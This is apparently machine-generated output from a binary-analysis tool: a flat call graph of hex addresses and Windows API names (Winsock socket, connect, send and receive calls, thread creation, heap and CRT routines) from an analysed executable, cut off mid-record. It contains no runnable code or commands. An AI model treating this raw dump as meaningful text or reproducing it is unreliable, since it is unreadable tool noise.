19023 2d8ab9a 19022->19023 19208 2d83fb0 19022->19208 19023->18980 19028 2d92eec _malloc 59 API calls 19027->19028 19029 2d86208 19028->19029 19031 2d88286 19030->19031 19034 2d882a7 19030->19034 20130 2d89530 19031->20130 19035 2d882cc 19034->19035 20133 2d82ac7 19034->20133 19035->18980 19037 2d90a50 Mailbox 68 API calls 19036->19037 19038 2d8d060 19037->19038 19039 2d8d14e 19038->19039 19040 2d82db5 73 API calls 19038->19040 19039->18980 19040->19038 19042 2d88338 WSASetLastError shutdown 19041->19042 19043 2d88328 19041->19043 19045 2d8a43c 69 API calls 19042->19045 19044 2d90a50 Mailbox 68 API calls 19043->19044 19046 2d8832d 19044->19046 19047 2d88355 19045->19047 19046->18980 19047->19046 19048 2d90a50 Mailbox 68 API calls 19047->19048 19048->19046 19050 2d833e1 19049->19050 19051 2d833c4 InterlockedCompareExchange 19049->19051 19053 2d829ee 76 API calls 19050->19053 19051->19050 19052 2d833d6 19051->19052 20223 2d832ab 19052->20223 19055 2d833f1 19053->19055 19055->18980 19057 2d92288 19056->19057 19058 2d922ab 19056->19058 19057->19058 19059 2d9228e 19057->19059 20276 2d922c3 19058->20276 19061 2d95d9b __set_osfhnd 59 API calls 19059->19061 19063 2d92293 19061->19063 19062 2d922be 19062->18980 19064 2d94e35 __fclose_nolock 9 API calls 19063->19064 19065 2d9229e 19064->19065 19065->18980 20333 2d927ae 19066->20333 19068 2d927a9 19068->18980 19070 2d89674 __EH_prolog 19069->19070 19071 2d81ba7 282 API calls 19070->19071 19073 2d896c9 19071->19073 19072 2d896e6 RtlEnterCriticalSection 19074 2d89701 19072->19074 19075 2d89704 RtlLeaveCriticalSection 19072->19075 19073->19072 19074->19075 19075->18980 19077 2d8a78c __EH_prolog 19076->19077 20339 2d8df33 19077->20339 19079 2d8a7aa shared_ptr 19079->18980 19081 2d9183d 19080->19081 19082 2d91861 19080->19082 19081->19082 19083 2d91851 GetProcessHeap HeapFree 19081->19083 19082->18980 19083->19082 19085 2d84118 19084->19085 19086 2d84112 19084->19086 19085->18980 20343 2d8a636 19086->20343 19089 2d92389 19088->19089 19090 2d92374 19088->19090 19089->19090 19092 2d92390 19089->19092 19091 2d95d9b __set_osfhnd 59 API calls 19090->19091 19093 2d92379 19091->19093 20345 2d95f90 19092->20345 19095 2d94e35 __fclose_nolock 9 API calls 19093->19095 19098 2d92384 19095->19098 19098->18980 20570 2da5330 19099->20570 19101 2d81bb1 RtlEnterCriticalSection 19102 2d81be9 RtlLeaveCriticalSection 19101->19102 19103 2d81bd1 19101->19103 20571 2d8e263 19102->20571 19103->19102 19105 2d81c55 RtlLeaveCriticalSection 19103->19105 19105->18980 19106 2d81c22 19106->19105 19109 2d90a50 Mailbox 68 API calls 19108->19109 19110 2d83c7e 19109->19110 20628 2d83ca2 19110->20628 19116 2d83d99 htons 19115->19116 19117 2d83dcb htons 19115->19117 19118 2d83bd3 60 API calls 19116->19118 20674 2d83c16 19117->20674 19120 2d83db7 htonl htonl 19118->19120 19121 2d83ded 19120->19121 19121->18980 19123 2d88f40 __EH_prolog 19122->19123 20680 2d8373f 19123->20680 19125 2d88f5a RtlEnterCriticalSection 19126 2d88f69 RtlLeaveCriticalSection 19125->19126 19128 2d88fa3 19126->19128 19128->18980 19130 2d92eec _malloc 59 API calls 19129->19130 19131 2d85362 SHGetSpecialFolderPathA 19130->19131 19132 2d85378 19131->19132 20689 2d936b4 19132->20689 19135 2d853e2 19135->18980 19137 2d853dc 20705 2d939c7 19137->20705 19140 2d90a79 19139->19140 19141 2d8513d 19139->19141 19142 2d932e7 __cinit 68 API calls 19140->19142 19141->18992 19142->19141 19144 2d90a50 Mailbox 68 API calls 19143->19144 19147 2d8a672 19144->19147 19145 2d8519d 19145->18998 19145->19001 19145->19002 19147->19145 19153 2d82db5 19147->19153 19149 2d90a50 Mailbox 68 API calls 19148->19149 19150 2d8ce26 19149->19150 19151 2d8cf35 19150->19151 19180 2d82b95 19150->19180 19151->18998 19154 2d82dca 19153->19154 19155 2d82de4 19153->19155 19157 2d90a50 Mailbox 68 API calls 19154->19157 19156 2d82dfc 19155->19156 19158 2d82def 19155->19158 19167 2d82d39 WSASetLastError WSASend 19156->19167 19160 2d82dcf 19157->19160 19161 2d90a50 Mailbox 68 API calls 19158->19161 19160->19147 19161->19160 19162 2d82e0c 19162->19160 19163 2d82e54 WSASetLastError select 19162->19163 19164 2d90a50 68 API calls Mailbox 19162->19164 19166 2d82d39 71 API calls 19162->19166 19177 2d8a43c 19163->19177 19164->19162 19166->19162 19168 2d8a43c 69 API calls 19167->19168 19169 2d82d6e 19168->19169 19170 2d82d82 19169->19170 19171 2d82d75 19169->19171 19173 2d82d7a 19170->19173 19174 2d90a50 Mailbox 68 API calls 19170->19174 19172 2d90a50 Mailbox 68 API calls 19171->19172 19172->19173 19175 2d90a50 Mailbox 68 API calls 19173->19175 19176 2d82d9c 19173->19176 19174->19173 19175->19176 19176->19162 19178 2d90a50 Mailbox 68 API calls 19177->19178 19179 2d8a448 WSAGetLastError 19178->19179 19179->19162 19181 2d82bb1 19180->19181 19182 2d82bc7 19180->19182 19183 2d90a50 Mailbox 68 API calls 19181->19183 19184 2d82bdf 19182->19184 19187 2d82bd2 19182->19187 19186 2d82bb6 19183->19186 19185 2d82be2 WSASetLastError WSARecv 19184->19185 19184->19186 19190 2d82d22 19184->19190 19192 2d82cbc WSASetLastError select 19184->19192 19194 2d90a50 68 API calls Mailbox 19184->19194 19188 2d8a43c 69 API calls 19185->19188 19186->19150 19189 2d90a50 Mailbox 68 API calls 19187->19189 19188->19184 19189->19186 19195 2d81996 19190->19195 19193 2d8a43c 69 API calls 19192->19193 19193->19184 19194->19184 19196 2d819bb 19195->19196 19197 2d8199f 19195->19197 19196->19186 19198 2d932e7 __cinit 68 API calls 19197->19198 19198->19196 19221 2d8e1b3 19199->19221 19201 2d8d033 19201->19020 19303 2d932fc 19202->19303 19205 2d92054 19205->19022 19206 2d9207d ResumeThread 19206->19022 19207 2d92076 CloseHandle 19207->19206 19209 2d90a50 Mailbox 68 API calls 19208->19209 19210 2d83fb8 19209->19210 20101 2d81815 19210->20101 19213 2d8a5be 19214 2d8a5c8 __EH_prolog 19213->19214 20107 2d8cb76 19214->20107 19222 2d8e1bd __EH_prolog 19221->19222 19227 2d84030 19222->19227 19226 2d8e1eb 19226->19201 19239 2da5330 19227->19239 19229 2d8403a GetProcessHeap RtlAllocateHeap 19230 2d8407c 19229->19230 19231 2d84053 std::exception::exception 19229->19231 19230->19226 19233 2d8408a 19230->19233 19240 2d8a5fd 19231->19240 19234 2d84094 __EH_prolog 19233->19234 19284 2d8a21c 19234->19284 19239->19229 19241 2d8a607 __EH_prolog 19240->19241 19248 2d8cbac 19241->19248 19246 2d9449a __CxxThrowException@8 RaiseException 19247 2d8a635 19246->19247 19254 2d8d70c 19248->19254 19251 2d8cbc6 19276 2d8d744 19251->19276 19253 2d8a624 19253->19246 19257 2d92453 19254->19257 19260 2d92481 19257->19260 19261 2d8a616 19260->19261 19262 2d9248f 19260->19262 19261->19251 19266 2d92517 19262->19266 19267 2d92494 19266->19267 19268 2d92520 19266->19268 19267->19261 19270 2d924d9 19267->19270 19269 2d92eb4 _free 59 API calls 19268->19269 19269->19267 19271 2d924e5 _strlen 19270->19271 19275 2d9250a 19270->19275 19272 2d92eec _malloc 59 API calls 19271->19272 19273 2d924f7 19272->19273 19274 2d96bfc std::exception::_Copy_str 59 API calls 19273->19274 19273->19275 19274->19275 19275->19261 19277 2d8d74e __EH_prolog 19276->19277 19280 2d8b66f 19277->19280 19279 2d8d785 Mailbox 19279->19253 19281 2d8b679 __EH_prolog 19280->19281 19282 2d92453 std::exception::exception 59 API calls 19281->19282 19283 2d8b68a Mailbox 19282->19283 19283->19279 19295 2d8b033 19284->19295 19287 2d83fdc 19302 2da5330 19287->19302 19289 2d83fe6 CreateEventA 19290 2d83ffd 19289->19290 19291 2d8400f 19289->19291 19292 2d83fb0 Mailbox 68 API calls 19290->19292 19291->19226 19293 2d84005 19292->19293 19294 2d8a5be Mailbox 60 API calls 19293->19294 19294->19291 19296 2d840c1 19295->19296 19297 2d8b03f 19295->19297 19296->19287 19298 2d93a8f _Allocate 60 API calls 19297->19298 19299 2d8b04f std::exception::exception 19297->19299 19298->19299 19299->19296 19300 2d9449a __CxxThrowException@8 RaiseException 19299->19300 19301 2d8fa64 19300->19301 19302->19289 19304 2d9330a 19303->19304 19305 2d9331e 19303->19305 19306 2d95d9b __set_osfhnd 59 API calls 19304->19306 19307 2d989ac __calloc_crt 59 API calls 19305->19307 19309 2d9330f 19306->19309 19308 2d9332b 19307->19308 19310 2d9337c 19308->19310 19322 2d95b9a 19308->19322 19311 2d94e35 __fclose_nolock 9 API calls 19309->19311 19313 2d92eb4 _free 59 API calls 19310->19313 19317 2d9204b 19311->19317 19315 2d93382 19313->19315 19315->19317 19327 2d95d7a 19315->19327 19316 2d95c21 __initptd 59 API calls 19318 2d93341 CreateThread 19316->19318 19317->19205 19317->19206 19317->19207 19318->19317 19321 2d93374 GetLastError 19318->19321 19335 2d9345c 19318->19335 19321->19310 19323 2d95bb2 __getptd_noexit 59 API calls 19322->19323 19324 2d95ba0 19323->19324 19325 2d93338 19324->19325 19326 2d9837f __amsg_exit 59 API calls 19324->19326 19325->19316 19326->19325 19332 2d95d67 19327->19332 19329 2d95d83 __dosmaperr 19330 2d95d9b __set_osfhnd 59 API calls 19329->19330 19331 2d95d96 19330->19331 19331->19317 19333 2d95bb2 __getptd_noexit 59 API calls 19332->19333 19334 2d95d6c 19333->19334 19334->19329 19336 2d93465 __threadstartex@4 19335->19336 19337 2d9910b __freeptd TlsGetValue 19336->19337 19338 2d9346b 19337->19338 19339 2d9349e 19338->19339 19340 2d93472 __threadstartex@4 19338->19340 19367 2d95a2f 19339->19367 19342 2d9912a __freeptd TlsSetValue 19340->19342 19343 2d93481 19342->19343 19346 2d93494 GetCurrentThreadId 19343->19346 19347 2d93487 GetLastError RtlExitUserThread 19343->19347 19344 2d934b9 ___crtIsPackagedApp 19345 2d934cd 19344->19345 19351 2d93404 19344->19351 19357 2d93395 19345->19357 19346->19344 19347->19346 19352 2d9340d LoadLibraryExW GetProcAddress 19351->19352 19353 2d93446 RtlDecodePointer 19351->19353 19354 2d9342f 19352->19354 19355 2d93430 RtlEncodePointer 19352->19355 19356 2d93456 19353->19356 19354->19345 19355->19353 19356->19345 19358 2d933a1 __lseeki64 19357->19358 19359 2d95b9a CallUnexpected 59 API calls 19358->19359 19360 2d933a6 19359->19360 19399 2d920a0 19360->19399 19368 2d95a3b __lseeki64 19367->19368 19369 2d95a54 19368->19369 19370 2d92eb4 _free 59 API calls 19368->19370 19371 2d95b43 __lseeki64 19368->19371 19372 2d92eb4 _free 59 API calls 19369->19372 19374 2d95a63 19369->19374 19370->19369 19371->19344 19372->19374 19373 2d95a72 19376 2d95a81 19373->19376 19378 2d92eb4 _free 59 API calls 19373->19378 19374->19373 19375 2d92eb4 _free 59 API calls 19374->19375 19375->19373 19377 2d95a90 19376->19377 19379 2d92eb4 _free 59 API calls 19376->19379 19380 2d95a9f 19377->19380 19381 2d92eb4 _free 59 API calls 19377->19381 19378->19376 19379->19377 19382 2d95aae 19380->19382 19383 2d92eb4 _free 59 API calls 19380->19383 19381->19380 19384 2d95ac0 19382->19384 19386 2d92eb4 _free 59 API calls 19382->19386 19383->19382 19385 2d9882d __lock 59 API calls 19384->19385 19389 2d95ac8 19385->19389 19386->19384 19387 2d95aeb 19847 2d95b4f 19387->19847 19389->19387 19391 2d92eb4 _free 59 API calls 19389->19391 19391->19387 19392 2d9882d __lock 59 API calls 19397 2d95aff ___removelocaleref 19392->19397 19393 2d95b30 19397->19393 19850 2d94f05 19397->19850 19419 2d91550 19399->19419 19402 2d920e8 TlsSetValue 19403 2d920f0 19402->19403 19441 2d8dbc4 19403->19441 19448 2d8dce7 19403->19448 19452 2d8dcb4 19403->19452 19430 2d915b4 19419->19430 19420 2d91630 19422 2d91646 19420->19422 19424 2d91643 CloseHandle 19420->19424 19421 2d915cc 19423 2d9160e ResetEvent 19421->19423 19428 2d915e5 OpenEventA 19421->19428 19469 2d91b50 19421->19469 19425 2d9448b __except_handler4 6 API calls 19422->19425 19426 2d91615 19423->19426 19424->19422 19429 2d9165e 19425->19429 19473 2d91790 19426->19473 19427 2d916dc WaitForSingleObject 19427->19430 19432 2d915ff 19428->19432 19433 2d91607 19428->19433 19429->19402 19429->19403 19430->19420 19430->19421 19430->19427 19434 2d916b0 CreateEventA 19430->19434 19438 2d91b50 GetCurrentProcessId 19430->19438 19440 2d916ce CloseHandle 19430->19440 19432->19433 19436 2d91604 CloseHandle 19432->19436 19433->19423 19433->19426 19434->19430 19435 2d915e2 19435->19428 19436->19433 19438->19430 19440->19430 19484 2d8d2f7 19441->19484 19449 2d8dd09 19448->19449 19453 2d87c31 std::bad_exception::bad_exception 60 API calls 19452->19453 19483 2d90bb0 19469->19483 19471 2d91ba2 GetCurrentProcessId 19472 2d91bb5 19471->19472 19472->19435 19474 2d9179f 19473->19474 19477 2d917d5 CreateEventA 19474->19477 19478 2d91b50 GetCurrentProcessId 19474->19478 19480 2d917f7 19474->19480 19475 2d9162d 19475->19420 19476 2d91803 SetEvent 19476->19475 19479 2d917eb 19477->19479 19477->19480 19481 2d917d2 19478->19481 19479->19480 19480->19475 19480->19476 19481->19477 19483->19471 19883 2d98997 RtlLeaveCriticalSection 19847->19883 19849 2d95af8 19849->19392 19883->19849 20104 2d92413 20101->20104 20105 2d924d9 std::exception::_Copy_str 59 API calls 20104->20105 20106 2d8182a 20105->20106 20106->19213 20113 2d8d63d 20107->20113 20110 2d8cb90 20122 2d8d675 20110->20122 20112 2d8a5eb 20116 2d8b161 20113->20116 20117 2d8b16b __EH_prolog 20116->20117 20118 2d92453 std::exception::exception 59 API calls 20117->20118 20119 2d8b17c 20118->20119 20120 2d87c31 std::bad_exception::bad_exception 60 API calls 20119->20120 20121 2d8a5dd 20120->20121 20121->20110 20123 2d8d67f __EH_prolog 20122->20123 20126 2d8b559 20123->20126 20125 2d8d6b6 Mailbox 20125->20112 20127 2d8b563 __EH_prolog 20126->20127 20128 2d8b161 std::bad_exception::bad_exception 60 API calls 20127->20128 20129 2d8b574 Mailbox 20128->20129 20129->20125 20151 2d8353e 20130->20151 20134 2d82ae8 WSASetLastError connect 20133->20134 20135 2d82ad8 20133->20135 20137 2d8a43c 69 API calls 20134->20137 20136 2d90a50 Mailbox 68 API calls 20135->20136 20138 2d82add 20136->20138 20139 2d82b07 20137->20139 20141 2d90a50 Mailbox 68 API calls 20138->20141 20139->20138 20140 2d90a50 Mailbox 68 API calls 20139->20140 20140->20138 20142 2d82b1b 20141->20142 20143 2d90a50 Mailbox 68 API calls 20142->20143 20146 2d82b38 20142->20146 20143->20146 20150 2d82b87 20146->20150 20207 2d83027 20146->20207 20149 2d90a50 Mailbox 68 API calls 20149->20150 20150->19035 20152 2d83548 __EH_prolog 20151->20152 20153 2d83576 20152->20153 20154 2d83557 20152->20154 20173 2d82edd WSASetLastError WSASocketA 20153->20173 20155 2d81996 68 API calls 20154->20155 20172 2d8355f 20155->20172 20158 2d835ad CreateIoCompletionPort 20159 2d835db 20158->20159 20160 2d835c5 GetLastError 20158->20160 20161 2d90a50 Mailbox 68 API calls 20159->20161 20162 2d90a50 Mailbox 68 API calls 20160->20162 20163 2d835d2 20161->20163 20162->20163 20164 2d835ef 20163->20164 20167 2d83626 20163->20167 20165 2d90a50 Mailbox 68 API calls 20164->20165 20166 2d83608 20165->20166 20181 2d829ee 20166->20181 20168 2d8de26 60 API calls 20167->20168 20170 2d83659 20168->20170 20171 2d90a50 Mailbox 68 API calls 20170->20171 20171->20172 20172->19034 20174 2d90a50 Mailbox 68 API calls 20173->20174 20175 2d82f0a WSAGetLastError 20174->20175 20176 2d82f41 20175->20176 20177 2d82f21 20175->20177 20176->20158 20176->20172 20178 2d82f3c 20177->20178 20179 2d82f27 setsockopt 20177->20179 20180 2d90a50 Mailbox 68 API calls 20178->20180 20179->20178 20180->20176 20182 2d82a0c 20181->20182 20183 2d82aad 20181->20183 20185 2d82a39 WSASetLastError closesocket 20182->20185 20189 2d90a50 Mailbox 68 API calls 20182->20189 20184 2d90a50 Mailbox 68 API calls 20183->20184 20186 2d82ab8 20183->20186 20184->20186 20187 2d8a43c 69 API calls 20185->20187 20186->20172 20188 2d82a51 20187->20188 20188->20183 20192 2d90a50 Mailbox 68 API calls 20188->20192 20190 2d82a21 20189->20190 20199 2d82f50 20190->20199 20194 2d82a5c 20192->20194 20195 2d82a7b ioctlsocket WSASetLastError closesocket 20194->20195 20196 2d90a50 Mailbox 68 API calls 20194->20196 20198 2d8a43c 69 API calls 20195->20198 20197 2d82a6e 20196->20197 20197->20183 20197->20195 20198->20183 20200 2d82f5b 20199->20200 20201 2d82f70 WSASetLastError setsockopt 20199->20201 20202 2d90a50 Mailbox 68 API calls 20200->20202 20203 2d8a43c 69 API calls 20201->20203 20206 2d82a36 20202->20206 20204 2d82f9e 20203->20204 20205 2d90a50 Mailbox 68 API calls 20204->20205 20204->20206 20205->20206 20206->20185 20208 2d8303b 20207->20208 20209 2d8304d WSASetLastError select 20207->20209 20210 2d90a50 Mailbox 68 API calls 20208->20210 20211 2d8a43c 69 API calls 20209->20211 20214 2d82b59 20210->20214 20212 2d83095 20211->20212 20213 2d90a50 Mailbox 68 API calls 20212->20213 20212->20214 20213->20214 20214->20150 20215 2d82fb4 20214->20215 20216 2d82fc0 20215->20216 20217 2d82fd5 WSASetLastError getsockopt 20215->20217 20219 2d90a50 Mailbox 68 API calls 20216->20219 20218 2d8a43c 69 API calls 20217->20218 20220 2d8300f 20218->20220 20222 2d82b7a 20219->20222 20221 2d90a50 Mailbox 68 API calls 20220->20221 20220->20222 20221->20222 20222->20149 20222->20150 20230 2da5330 20223->20230 20225 2d832b5 RtlEnterCriticalSection 20226 2d90a50 Mailbox 68 API calls 20225->20226 20227 2d832d6 20226->20227 20231 2d83307 20227->20231 20230->20225 20233 2d83311 __EH_prolog 20231->20233 20234 2d83350 20233->20234 20243 2d87db5 20233->20243 20247 2d8239d 20234->20247 20237 2d90a50 Mailbox 68 API calls 20239 2d8337c 20237->20239 20241 2d82d39 71 API calls 20239->20241 20242 2d83390 20241->20242 20253 2d87d5e 20242->20253 20244 2d87dc3 20243->20244 20246 2d87e39 20244->20246 20257 2d8891a 20244->20257 20246->20233 20251 2d823ab 20247->20251 20248 2d82417 20248->20237 20248->20242 20249 2d823c1 PostQueuedCompletionStatus 20250 2d823da RtlEnterCriticalSection 20249->20250 20249->20251 20250->20251 20251->20248 20251->20249 20252 2d823f8 InterlockedExchange RtlLeaveCriticalSection 20251->20252 20252->20251 20254 2d87d63 20253->20254 20255 2d832ee RtlLeaveCriticalSection 20254->20255 20273 2d81e7f 20254->20273 20255->19050 20258 2d88944 20257->20258 20259 2d87d5e 68 API calls 20258->20259 20260 2d8898a 20259->20260 20261 2d889b1 20260->20261 20263 2d8a1a7 20260->20263 20261->20246 20264 2d8a1c1 20263->20264 20265 2d8a1b1 20263->20265 20264->20261 20265->20264 20268 2d8fa65 20265->20268 20269 2d92413 std::exception::exception 59 API calls 20268->20269 20270 2d8fa7d 20269->20270 20271 2d9449a __CxxThrowException@8 RaiseException 20270->20271 20272 2d8fa92 20271->20272 20274 2d90a50 Mailbox 68 API calls 20273->20274 20275 2d81e90 20274->20275 20275->20254 20286 2d921bb 20276->20286 20279 2d922e5 20280 2d95d9b __set_osfhnd 59 API calls 20279->20280 20281 2d922ea 20280->20281 20282 2d94e35 __fclose_nolock 9 API calls 20281->20282 20284 2d922f5 ___ascii_stricmp 20282->20284 20283 2d958ba 66 API calls __tolower_l 20285 2d922fc 20283->20285 20284->19062 20285->20283 20285->20284 20287 2d921cc 20286->20287 20293 2d92219 20286->20293 20288 2d95b9a CallUnexpected 59 API calls 20287->20288 20289 2d921d2 20288->20289 20290 2d921f9 20289->20290 20294 2d950ff 20289->20294 20290->20293 20309 2d95481 20290->20309 20293->20279 20293->20285 20295 2d9510b __lseeki64 20294->20295 20296 2d95b9a CallUnexpected 59 API calls 20295->20296 20297 2d95114 20296->20297 20298 2d95143 20297->20298 20299 2d95127 20297->20299 20300 2d9882d __lock 59 API calls 20298->20300 20302 2d95b9a CallUnexpected 59 API calls 20299->20302 20301 2d9514a 20300->20301 20321 2d9517f 20301->20321 20304 2d9512c 20302->20304 20307 2d9513a __lseeki64 20304->20307 20308 2d9837f __amsg_exit 59 API calls 20304->20308 20307->20290 20308->20307 20310 2d9548d __lseeki64 20309->20310 20311 2d95b9a CallUnexpected 59 API calls 20310->20311 20312 2d95497 20311->20312 20313 2d954a9 20312->20313 20314 2d9882d __lock 59 API calls 20312->20314 20315 2d954b7 __lseeki64 20313->20315 20317 2d9837f __amsg_exit 59 API calls 20313->20317 20319 2d954c7 20314->20319 20315->20293 20316 2d954f4 20329 2d9551e 20316->20329 20317->20315 20319->20316 20320 2d92eb4 _free 59 API calls 20319->20320 20320->20316 20322 2d9518a ___addlocaleref ___removelocaleref 20321->20322 20324 2d9515e 20321->20324 20323 2d94f05 ___freetlocinfo 59 API calls 20322->20323 20322->20324 20323->20324 20325 2d95176 20324->20325 20328 2d98997 RtlLeaveCriticalSection 20325->20328 20327 2d9517d 20327->20304 20328->20327 20332 2d98997 RtlLeaveCriticalSection 20329->20332 20331 2d95525 20331->20313 20332->20331 20334 2d927cb 20333->20334 20335 2d927db _strlen 20334->20335 20336 2d95d9b __set_osfhnd 59 API calls 20334->20336 20335->19068 20337 2d927d0 20336->20337 20338 2d94e35 __fclose_nolock 9 API calls 20337->20338 20338->20335 20340 2d8df3d __EH_prolog 20339->20340 20341 2d93a8f _Allocate 60 API calls 20340->20341 20342 2d8df54 20341->20342 20342->19079 20344 2d8a645 GetProcessHeap HeapFree 20343->20344 20344->19085 20346 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 20345->20346 20347 2d96005 20346->20347 20348 2d95d9b __set_osfhnd 59 API calls 20347->20348 20349 2d9600a 20348->20349 20350 2d96adb 20349->20350 20365 2d9602a __output_l __aulldvrm _strlen 20349->20365 20390 2d99d71 20349->20390 20351 2d95d9b __set_osfhnd 59 API calls 20350->20351 20352 2d96ae0 20351->20352 20354 2d94e35 __fclose_nolock 9 API calls 20352->20354 20355 2d96ab5 20354->20355 20356 2d9448b __except_handler4 6 API calls 20355->20356 20357 2d923b6 20356->20357 20357->19098 20369 2d95e41 20357->20369 20359 2d96b10 79 API calls _write_multi_char 20359->20365 20360 2d96693 RtlDecodePointer 20360->20365 20361 2d96b58 79 API calls _write_multi_char 20361->20365 20362 2d92eb4 _free 59 API calls 20362->20365 20363 2d9fa24 61 API calls __cftof 20363->20365 20364 2d989f4 __malloc_crt 59 API calls 20364->20365 20365->20350 20365->20355 20365->20359 20365->20360 20365->20361 20365->20362 20365->20363 20365->20364 20366 2d966f6 RtlDecodePointer 20365->20366 20367 2d96b84 79 API calls _write_string 20365->20367 20368 2d9671b RtlDecodePointer 20365->20368 20397 2d9dc4e 20365->20397 20366->20365 20367->20365 20368->20365 20370 2d99d71 __fclose_nolock 59 API calls 20369->20370 20371 2d95e4f 20370->20371 20372 2d95e5a 20371->20372 20373 2d95e71 20371->20373 20375 2d95d9b __set_osfhnd 59 API calls 20372->20375 20374 2d95e76 20373->20374 20383 2d95e83 __flsbuf 20373->20383 20376 2d95d9b __set_osfhnd 59 API calls 20374->20376 20384 2d95e5f 20375->20384 20376->20384 20377 2d95edd 20378 2d95f61 20377->20378 20379 2d95ee7 20377->20379 20380 2d99d95 __write 79 API calls 20378->20380 20381 2d95f01 20379->20381 20386 2d95f18 20379->20386 20380->20384 20412 2d99d95 20381->20412 20383->20377 20383->20384 20387 2d95ed2 20383->20387 20400 2d9f6e2 20383->20400 20384->19098 20386->20384 20440 2d9f736 20386->20440 20387->20377 20409 2d9f8a5 20387->20409 20391 2d99d7b 20390->20391 20392 2d99d90 20390->20392 20393 2d95d9b __set_osfhnd 59 API calls 20391->20393 20392->20365 20394 2d99d80 20393->20394 20395 2d94e35 __fclose_nolock 9 API calls 20394->20395 20396 2d99d8b 20395->20396 20396->20365 20398 2d921bb _LocaleUpdate::_LocaleUpdate 59 API calls 20397->20398 20399 2d9dc5f 20398->20399 20399->20365 20401 2d9f6fa 20400->20401 20402 2d9f6ed 20400->20402 20404 2d9f706 20401->20404 20405 2d95d9b __set_osfhnd 59 API calls 20401->20405 20403 2d95d9b __set_osfhnd 59 API calls 20402->20403 20406 2d9f6f2 20403->20406 20404->20387 20407 2d9f727 20405->20407 20406->20387 20408 2d94e35 __fclose_nolock 9 API calls 20407->20408 20408->20406 20410 2d989f4 __malloc_crt 59 API calls 20409->20410 20411 2d9f8ba 20410->20411 20411->20377 20413 2d99da1 __lseeki64 20412->20413 20414 2d99dae 20413->20414 20415 2d99dc5 20413->20415 20416 2d95d67 __set_osfhnd 59 API calls 20414->20416 20417 2d99e64 20415->20417 20419 2d99dd9 20415->20419 20418 2d99db3 20416->20418 20420 2d95d67 __set_osfhnd 59 API calls 20417->20420 20421 2d95d9b __set_osfhnd 59 API calls 20418->20421 20422 2d99e01 20419->20422 20423 2d99df7 20419->20423 20424 2d99dfc 20420->20424 20432 2d99dba __lseeki64 20421->20432 20465 2da0bc7 20422->20465 20425 2d95d67 __set_osfhnd 59 API calls 20423->20425 20428 2d95d9b __set_osfhnd 59 API calls 20424->20428 20425->20424 20427 2d99e07 20429 2d99e1a 20427->20429 20430 2d99e2d 20427->20430 20431 2d99e70 20428->20431 20474 2d99e84 20429->20474 20433 2d95d9b __set_osfhnd 59 API calls 20430->20433 20435 2d94e35 __fclose_nolock 9 API calls 20431->20435 20432->20384 20436 2d99e32 20433->20436 20435->20432 20438 2d95d67 __set_osfhnd 59 API calls 20436->20438 20437 2d99e26 20533 2d99e5c 20437->20533 20438->20437 20441 2d9f742 __lseeki64 20440->20441 20442 2d9f76b 20441->20442 20443 2d9f753 20441->20443 20445 2d9f810 20442->20445 20450 2d9f7a0 20442->20450 20444 2d95d67 __set_osfhnd 59 API calls 20443->20444 20446 2d9f758 20444->20446 20447 2d95d67 __set_osfhnd 59 API calls 20445->20447 20448 2d95d9b __set_osfhnd 59 API calls 20446->20448 20449 2d9f815 20447->20449 20451 2d9f760 __lseeki64 20448->20451 20452 2d95d9b __set_osfhnd 59 API calls 20449->20452 20453 2da0bc7 ___lock_fhandle 60 API calls 20450->20453 20451->20384 20454 2d9f81d 20452->20454 20455 2d9f7a6 20453->20455 20456 2d94e35 __fclose_nolock 9 API calls 20454->20456 20457 2d9f7bc 20455->20457 20458 2d9f7d4 20455->20458 20456->20451 20459 2d9f832 __lseeki64_nolock 61 API calls 20457->20459 20460 2d95d9b __set_osfhnd 59 API calls 20458->20460 20463 2d9f7cb 20459->20463 20461 2d9f7d9 20460->20461 20462 2d95d67 __set_osfhnd 59 API calls 20461->20462 20462->20463 20566 2d9f808 20463->20566 20467 2da0bd3 __lseeki64 20465->20467 20466 2da0c22 RtlEnterCriticalSection 20468 2da0c48 __lseeki64 20466->20468 20467->20466 20469 2d9882d __lock 59 API calls 20467->20469 20468->20427 20470 2da0bf8 20469->20470 20471 2da0c10 20470->20471 20472 2d9914c __mtinitlocks InitializeCriticalSectionAndSpinCount 20470->20472 20536 2da0c4c 20471->20536 20472->20471 20475 2d99e91 __write_nolock 20474->20475 20476 2d99eef 20475->20476 20477 2d99ed0 20475->20477 20505 2d99ec5 20475->20505 20481 2d99f47 20476->20481 20482 2d99f2b 20476->20482 20478 2d95d67 __set_osfhnd 59 API calls 20477->20478 20480 2d99ed5 20478->20480 20479 2d9448b __except_handler4 6 API calls 20483 2d9a6e5 20479->20483 20484 2d95d9b __set_osfhnd 59 API calls 20480->20484 20491 2d99f60 20481->20491 20540 2d9f832 20481->20540 20485 2d95d67 __set_osfhnd 59 API calls 20482->20485 20483->20437 20486 2d99edc 20484->20486 20489 2d99f30 20485->20489 20490 2d94e35 __fclose_nolock 9 API calls 20486->20490 20488 2d9f6e2 __flsbuf 59 API calls 20492 2d99f6e 20488->20492 20493 2d95d9b __set_osfhnd 59 API calls 20489->20493 20490->20505 20491->20488 20494 2d9a2c7 20492->20494 20499 2d95b9a CallUnexpected 59 API calls 20492->20499 20495 2d99f37 20493->20495 20496 2d9a65a WriteFile 20494->20496 20497 2d9a2e5 20494->20497 20498 2d94e35 __fclose_nolock 9 API calls 20495->20498 20500 2d9a2ba GetLastError 20496->20500 20507 2d9a287 20496->20507 20501 2d9a409 20497->20501 20510 2d9a2fb 20497->20510 20498->20505 20502 2d99f9a GetConsoleMode 20499->20502 20500->20507 20511 2d9a414 20501->20511 20525 2d9a4fe 20501->20525 20502->20494 20504 2d99fd9 20502->20504 20503 2d9a693 20503->20505 20506 2d95d9b __set_osfhnd 59 API calls 20503->20506 20504->20494 20508 2d99fe9 GetConsoleCP 20504->20508 20505->20479 20512 2d9a6c1 20506->20512 20507->20503 20507->20505 20513 2d9a3e7 20507->20513 20508->20503 20531 2d9a018 20508->20531 20509 2d9a36a WriteFile 20509->20500 20509->20510 20510->20503 20510->20507 20510->20509 20511->20503 20511->20507 20514 2d9a479 WriteFile 20511->20514 20515 2d95d67 __set_osfhnd 59 API calls 20512->20515 20516 2d9a68a 20513->20516 20517 2d9a3f2 20513->20517 20514->20500 20514->20511 20515->20505 20520 2d95d7a __dosmaperr 59 API calls 20516->20520 20519 2d95d9b __set_osfhnd 59 API calls 20517->20519 20518 2d9a573 WideCharToMultiByte 20518->20500 20518->20525 20522 2d9a3f7 20519->20522 20520->20505 20521 2d9a5c2 WriteFile 20524 